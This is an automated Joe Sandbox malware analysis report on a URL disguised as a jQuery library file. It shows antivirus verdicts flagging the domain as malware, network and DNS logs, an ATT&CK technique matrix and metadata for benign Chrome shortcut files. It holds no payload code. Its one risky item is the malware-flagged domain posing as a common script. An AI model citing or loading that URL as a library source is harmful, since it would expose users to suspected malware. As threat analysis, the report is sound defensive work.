Edit tour

Windows Analysis Report
https://abu.usaday.biz:443/jquery-3.6.0.min.js

Overview

General Information

Sample URL:https://abu.usaday.biz:443/jquery-3.6.0.min.js
Analysis ID:1472239
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Stores files to the Windows start menu directory
Uses insecure TLS / SSL version for HTTPS connection

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • chrome.exe (PID: 5700 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3220 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1964,i,8453212214177823688,14741877041424524147,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 3192 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://abu.usaday.biz:443/jquery-3.6.0.min.js" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://abu.usaday.biz:443/jquery-3.6.0.min.jsAvira URL Cloud: detection malicious, Label: malware
Source: https://abu.usaday.biz/favicon.icoAvira URL Cloud: Label: malware
Source: https://abu.usaday.biz/jquery-3.6.0.min.jsHTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49726 version: TLS 1.0
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49726 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: abu.usaday.bizConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: abu.usaday.bizConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://abu.usaday.biz/jquery-3.6.0.min.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficDNS traffic detected: DNS query: abu.usaday.biz
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: unknownHTTP traffic detected: POST /report/v4?s=ftlJUK%2BI3OqS2dum59cxIXlPKmsD98aidFuTkbsqD7RWgqkT3S5izV7hIKQQrkNUi8odNToPNBeAOOUZ7SdYP2Hcp6N%2Bq2ufFejp4Mpor50V%2FjtRFX3eXaYpT3ov%2BJU%2FzA%3D%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 436Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 12 Jul 2024 12:55:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ftlJUK%2BI3OqS2dum59cxIXlPKmsD98aidFuTkbsqD7RWgqkT3S5izV7hIKQQrkNUi8odNToPNBeAOOUZ7SdYP2Hcp6N%2Bq2ufFejp4Mpor50V%2FjtRFX3eXaYpT3ov%2BJU%2FzA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a212fcd7fcb19f7-EWRalt-svc: h3=":443"; ma=86400
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: classification engineClassification label: mal56.win@16/10@6/5
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1964,i,8453212214177823688,14741877041424524147,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://abu.usaday.biz:443/jquery-3.6.0.min.js"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1964,i,8453212214177823688,14741877041424524147,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1472239 URL: https://abu.usaday.biz:443/... Startdate: 12/07/2024 Architecture: WINDOWS Score: 56 24 Antivirus detection for URL or domain 2->24 26 Antivirus / Scanner detection for submitted sample 2->26 6 chrome.exe 9 2->6         started        9 chrome.exe 2->9         started        process3 dnsIp4 14 192.168.2.5, 443, 49322, 49703 unknown unknown 6->14 16 239.255.255.250 unknown Reserved 6->16 11 chrome.exe 6->11         started        process5 dnsIp6 18 www.google.com 142.250.186.132, 443, 49716, 49729 GOOGLEUS United States 11->18 20 a.nel.cloudflare.com 35.190.80.1, 443, 49714, 49715 GOOGLEUS United States 11->20 22 abu.usaday.biz 188.114.96.3, 443, 49709, 49710 CLOUDFLARENETUS European Union 11->22

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://abu.usaday.biz:443/jquery-3.6.0.min.js100%Avira URL Cloudmalware
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://abu.usaday.biz/favicon.ico100%Avira URL Cloudmalware
https://a.nel.cloudflare.com/report/v4?s=ftlJUK%2BI3OqS2dum59cxIXlPKmsD98aidFuTkbsqD7RWgqkT3S5izV7hIKQQrkNUi8odNToPNBeAOOUZ7SdYP2Hcp6N%2Bq2ufFejp4Mpor50V%2FjtRFX3eXaYpT3ov%2BJU%2FzA%3D%3D0%Avira URL Cloudsafe

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.210.172
truefalse
    unknown
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      unknown
      abu.usaday.biz
      188.114.96.3
      truefalse
        unknown
        www.google.com
        142.250.186.132
        truefalse
          unknown
          fp2e7a.wpc.phicdn.net
          192.229.221.95
          truefalse
            unknown
            NameMaliciousAntivirus DetectionReputation
            https://abu.usaday.biz/favicon.icofalse
            • Avira URL Cloud: malware
            unknown
            https://a.nel.cloudflare.com/report/v4?s=ftlJUK%2BI3OqS2dum59cxIXlPKmsD98aidFuTkbsqD7RWgqkT3S5izV7hIKQQrkNUi8odNToPNBeAOOUZ7SdYP2Hcp6N%2Bq2ufFejp4Mpor50V%2FjtRFX3eXaYpT3ov%2BJU%2FzA%3D%3Dfalse
            • Avira URL Cloud: safe
            unknown
            https://abu.usaday.biz/jquery-3.6.0.min.jsfalse
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              239.255.255.250
              unknownReserved
              unknownunknownfalse
              188.114.96.3
              abu.usaday.bizEuropean Union
              13335CLOUDFLARENETUSfalse
              142.250.186.132
              www.google.comUnited States
              15169GOOGLEUSfalse
              35.190.80.1
              a.nel.cloudflare.comUnited States
              15169GOOGLEUSfalse
              IP
              192.168.2.5
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1472239
              Start date and time:2024-07-12 14:54:22 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 3m 10s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:browseurl.jbs
              Sample URL:https://abu.usaday.biz:443/jquery-3.6.0.min.js
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:8
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal56.win@16/10@6/5
              EGA Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 142.250.186.131, 142.250.185.174, 108.177.15.84, 34.104.35.123, 13.85.23.86, 199.232.210.172, 192.229.221.95, 20.242.39.171, 20.3.187.198, 216.58.206.67
              • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, clientservices.googleapis.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, clients.l.google.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtSetInformationFile calls found.
              • VT rate limit hit for: https://abu.usaday.biz:443/jquery-3.6.0.min.js
              No simulations
              No context
              No context
              No context
              No context
              No context
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jul 12 11:55:16 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2677
              Entropy (8bit):3.981555139389351
              Encrypted:false
              SSDEEP:48:8CdiTuOjHdidAKZdA19ehwiZUklqehSy+3:8v7L1y
              MD5:4E92DA3A5E909F47CCD70B59083858F7
              SHA1:4B3B29DE9DD99529A4CEFE7F0F6A8AB87B49EA4B
              SHA-256:5B480DA6CA8801A7CA785D7304E302528B56160F1B3D94B9900EA37CB3C4C8F4
              SHA-512:8E9516B71F174F2A20AE761F201B4957CFF95F9B3437D50F7D395B41429FDB13E19EFA09B7AE865FDD69E90D5ECDB8E4324177B58039920671BBAD8342687A4D
              Malicious:false
              Reputation:low
              Preview:L..................F.@.. ...$+.,....`...Z...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.f....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.f....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.f....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.f..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.f...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jul 12 11:55:15 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2679
              Entropy (8bit):3.99642092359723
              Encrypted:false
              SSDEEP:48:8adiTuOjHdidAKZdA1weh/iZUkAQkqehly+2:83759Q4y
              MD5:3BC13DBE0E3FD5CE0362A1E17740B20B
              SHA1:477BCFE3ABFA33CEDC5A718366BEE60C9EC76470
              SHA-256:878136A546A7DD1396F794474F749EAF45CDD350AE6052353A825BBFA76CD787
              SHA-512:68A07F69175B2DB534DBE32D1F8EE5A14B16C5299B74ED594B0C10DC8B997496EE92E9F559DF12868279AE57EFB0A1FA4227E579E05C12A64E0E041CAD2EEECF
              Malicious:false
              Reputation:low
              Preview:L..................F.@.. ...$+.,.......Z...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.f....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.f....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.f....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.f..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.f...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2693
              Entropy (8bit):4.005839744126493
              Encrypted:false
              SSDEEP:48:8xfdiTuOsHdidAKZdA14tseh7sFiZUkmgqeh7sry+BX:8x47Unpy
              MD5:6EC724F2ED8977BE2EFA3D5969AE7DC9
              SHA1:BEB1D9998359125C4C2CEE464F9540A5F66734E8
              SHA-256:CB787B9FC131BA257164D7F1E2321B5482201CA7172253FD3DF0DB0C11719C94
              SHA-512:41A20E246383E103E70FE519C25481B869CA56B342301F3AC4979BB8A9868A40A8D875FCF18593A7BD1D4FCB028E600714548A0E2C29ADFEBB06FE3AB30D5D9C
              Malicious:false
              Reputation:low
              Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.f....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.f....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.f....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.f..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jul 12 11:55:15 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2681
              Entropy (8bit):3.9942408834030467
              Encrypted:false
              SSDEEP:48:81diTuOjHdidAKZdA1vehDiZUkwqehRy+R:8a7aTy
              MD5:5594D4602D1F9ACA48EFC658934EB847
              SHA1:91E5896C27907FAA0A40D4D52A63ADCC1A29DD61
              SHA-256:914CEE2D42977D1560D9B0991E10C3F1A73FE6578267AC67B816BD17F5EA6ADD
              SHA-512:B556F5E899E635BE419AA3E2D43AB5E3FDB2B80D86C0AD9C91E58110366178511A51FA4EF254F3A2F279F81EC6E7C0E88E1C9FCB4CAB0B2F00163ED6C2186BD0
              Malicious:false
              Reputation:low
